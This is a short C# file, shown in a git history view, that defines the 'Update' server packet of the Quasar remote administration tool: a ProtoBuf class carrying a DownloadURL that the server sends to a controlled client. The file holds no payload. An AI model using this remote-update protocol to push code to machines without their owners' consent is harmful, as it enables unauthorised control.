Quasar/Client/Core/Packets/ServerPackets/Update.cs

25 lines
462 B
C#
Raw Normal View History

2014-07-08 12:58:53 +00:00
using ProtoBuf;
2015-01-13 18:29:11 +00:00
namespace xClient.Core.Packets.ServerPackets
2014-07-08 12:58:53 +00:00
{
[ProtoContract]
public class Update : IPacket
{
[ProtoMember(1)]
public string DownloadURL { get; set; }
public Update()
{
}
2014-07-08 12:58:53 +00:00
public Update(string downloadurl)
{
this.DownloadURL = downloadurl;
}
public void Execute(Client client)
{
client.Send<Update>(this);
}
}
}